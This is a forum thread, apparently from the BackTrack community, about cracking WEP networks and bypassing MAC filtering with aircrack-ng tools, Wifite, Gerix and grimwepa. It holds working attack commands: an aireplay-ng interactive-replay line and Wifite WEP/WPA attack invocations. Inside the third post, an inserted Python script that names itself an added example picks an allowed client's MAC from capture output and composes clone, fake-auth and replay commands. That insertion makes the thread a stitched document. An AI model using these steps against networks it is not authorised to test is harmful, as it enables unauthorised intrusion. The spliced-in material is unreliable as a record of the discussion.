
Thread: better ways to audit WEP?

  1. #1
    Just burned their ISO
    Join Date
    Jan 2010

    Default better ways to audit WEP?

    OK, I am wondering: are there better ways to audit WEP than aireplay, aircrack, and airodump? I mean these do the trick, but on first attempt I noticed that traffic almost HAD to be happening or it wasn't collecting enough #DATA.

    Is it possible to audit a WEP network without traffic? And if so, what would I use? Also, for kicks and giggles I added MAC filtering to my network and noticed that by my current means I wasn't getting in, even though it was just WEP encryption. Is that always the case? Or are there ways around that?

    **thinking aloud** I guess if I did a scan in airmon and pulled a MAC from, say, my print server (already in my router) I might be able to get in if I cloned its MAC. ...hmm, or is my thinking WAY off? And by cloning a MAC like this and just injecting, will this still allow me to audit my network?

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010

    Default Re: better ways to audit WEP?

    Did you do any research about auditing WEP without traffic being sent over the wireless network? If so, what did that tell you? Perhaps reading about how the attacks against WEP work might enlighten you...

    What about MAC filtering? Did you read up on how that works?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned their ISO
    Join Date
    Jan 2010

    Default Re: better ways to audit WEP?

    Just after I posted this I wanted to take it back. I pulled a dumb newbie move and asked a question here on the board before I tried looking for myself. I swear I pushed send and wished there was a way to take it back. I researched it and found at least one way around the traffic issue with an aireplay command. I apologize for asking for help before I tried to even help myself, but that part, for now, I have at least some answer to. The command being:

    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0

    Next I think I am going to try and figure out how to use other scripts like wiffy, wepbuster, etc., and see how they do compared to what I've been working with so far.
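
    An added example, not from any poster in this thread, tying together the two points above: what the `-p 0841` value in that aireplay-ng command actually asks the AP to do, and how to pick a MAC that is already on the router's allow-list (the print-server idea from the first post) out of airodump-ng's CSV output. The airodump CSV excerpt, BSSID and station MACs below are constructed for the example; the script only decodes and composes command lines and never touches a wireless interface. Cloning a client's MAC while that client is still active will conflict with it, so the composed commands are meant to be run on a network you own or are authorised to test.

```python
"""Decode the aireplay-ng -p frame-control value, find stations that
airodump-ng saw associated with a target BSSID, and compose the
MAC-clone + fake-auth + interactive-replay command lines.

Added example: MACs, ESSID and CSV rows are made up; nothing is executed."""

import re

# IEEE 802.11 Frame Control: first byte = version/type/subtype,
# second byte = flags. aireplay-ng -p takes the two bytes as 4 hex digits.
FLAG_TO_DS = 0x01
FLAG_FROM_DS = 0x02
FLAG_PROTECTED = 0x40          # the "WEP" bit in the original standard
FRAME_TYPES = {0: "management", 1: "control", 2: "data"}

MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")

# Constructed airodump-ng CSV excerpt (layout of the file airodump-ng -w writes):
# AP section first, blank line, then the station section.
SAMPLE_AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1A:2B:3C:4D:5E, 2010-10-05 21:00:01, 2010-10-05 21:09:58, 6, 54, WEP, WEP, , -38, 512, 1337, 0. 0. 0. 0, 7, homenet,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:AA:BB:CC:DD:01, 2010-10-05 21:00:05, 2010-10-05 21:09:40, -45, 220, 00:1A:2B:3C:4D:5E,
00:AA:BB:CC:DD:02, 2010-10-05 21:02:11, 2010-10-05 21:03:00, -70, 3, (not associated), homenet,othernet
"""


def is_mac(s: str) -> bool:
    return bool(MAC_RE.match(s))


def decode_frame_control(fc_hex: str) -> dict:
    """Decode a 16-bit Frame Control value written as 4 hex digits.
    '0841' -> data frame, To-DS set, Protected set: a station-to-AP frame
    addressed to broadcast, which the AP relays to the cell (re-encrypted
    with a fresh IV), so each replay produces new IVs even with no clients."""
    if len(fc_hex) != 4:
        raise ValueError("expected 4 hex digits, e.g. 0841")
    first = int(fc_hex[:2], 16)
    flags = int(fc_hex[2:], 16)
    return {
        "type": FRAME_TYPES.get((first >> 2) & 0x3, "reserved"),
        "subtype": (first >> 4) & 0xF,
        "to_ds": bool(flags & FLAG_TO_DS),
        "from_ds": bool(flags & FLAG_FROM_DS),
        "protected": bool(flags & FLAG_PROTECTED),
    }


def associated_clients(csv_text: str, bssid: str) -> list:
    """Station MACs that airodump-ng recorded as associated with `bssid`.
    A MAC allow-list on the AP must already contain these addresses."""
    clients = []
    in_station_section = False
    for line in csv_text.splitlines():
        if line.startswith("Station MAC"):
            in_station_section = True
            continue
        if not in_station_section or not line.strip():
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) >= 6 and fields[5].upper() == bssid.upper():
            clients.append(fields[0])
    return clients


def build_replay_command(bssid: str, source_mac: str, iface: str = "wlan0") -> str:
    """The interactive-replay line from the thread with -h set to a MAC that
    passes the AP's filter. Returned as a string; nothing is run here."""
    for mac in (bssid, source_mac):
        if not is_mac(mac):
            raise ValueError(f"not a MAC address: {mac!r}")
    return (f"aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF "
            f"-b {bssid} -h {source_mac} {iface}")


def plan_from_capture(csv_text: str, bssid: str, essid: str, iface: str = "wlan0") -> list:
    """Compose the operator's steps: clone the first associated client's MAC
    on the interface (macchanger), fake-authenticate as it, then replay.
    Returns the command lines in order, or [] if no client was seen."""
    clients = associated_clients(csv_text, bssid)
    if not clients:
        return []
    mac = clients[0]
    return [
        f"ifconfig {iface} down && macchanger -m {mac} {iface} && ifconfig {iface} up",
        f"aireplay-ng -1 0 -e {essid} -a {bssid} -h {mac} {iface}",
        build_replay_command(bssid, mac, iface),
    ]


if __name__ == "__main__":
    print(decode_frame_control("0841"))
    for cmd in plan_from_capture(SAMPLE_AIRODUMP_CSV, "00:1A:2B:3C:4D:5E", "homenet"):
        print(cmd)
```

    Note that `-h` only spoofs the source address inside the injected frames; the `macchanger` step is there so that the fake authentication and any reply traffic line up with the same address the AP's filter already trusts.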

  4. #4
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    shining my spoon

    Default Re: better ways to audit WEP?

    Learning is good, but don't concentrate on WEP too much; it's going the way of the dinosaurs. Extinction is on the horizon for WEP. Pretty much any real network penetration that you're going to be paid to do will have to be WPA/WPA2, or you will just have to gain access to a vulnerable computer another way, such as SE. Soon the only people with WEP will be mom and pop, and that will get you either some time in the clink or just disowned by this community.

    WEP is a lie
    Wielder of the spoon of doom
    Summercon, Toorcon, Defcon, Bsides, Derbycon, Shmoocon oh my
    Come hang out with hackers on twitter @gunrunr556

  5. #5
    Good friend of the forums
    Join Date
    Feb 2010

    Default Re: better ways to audit WEP?

    Just use wepbuster or spoonwep.

  6. #6

    Default Re: better ways to audit WEP?

    WIFITE - try this - a great wrapper around the necessary aircrack-ng commands!
    Watch & learn...

    mkdir /pentest/wireless/wifite && cd /pentest/wireless/wifite && wget -q
    WEP Attack:
    python -keepmac -console -nowpa -wepw 5 -pps 600 -i wlan0
    WPA/WPA2 Attack:
    python -keepmac -console -nowep -wpaw 3 -d /pentest/password/wordlists/{your-l33t-dict}
    Also update the Python script on a regular basis:
    python -upgrade
    Last edited by brtw2003; 10-05-2010 at 09:38 PM.

  7. #7
    Member skor78's Avatar
    Join Date
    Jul 2009

    Default Re: better ways to audit WEP?

    To crack WEP with/without clients, I simply use Gerix wifi cracker, which is already included in BT4 R1; it's quite easy and user-friendly. I also use Gerix to get the WPA/WPA2 handshakes and aircrack them, but to use cowpatty or pyrit, I prefer to do it by hand in Konsole.

    To crack WEP SKA (shared key auth.) I use grimwepa. Don't know why, but in Gerix I can't get IVs auditing WEP SKA. But in grimwepa I just attack using the ARP-replay attack with the client selected, and in 2 min. I have 30,000 IVs and the key cracked.

    Wifite is cool, but fully automated, meaning it will attack all available networks, even if the WPA router has no client attached.
    I need to experiment a bit more before I can say more, but for now I'm only using Gerix except on WEP SKA.

    Hope it helps, cheers.
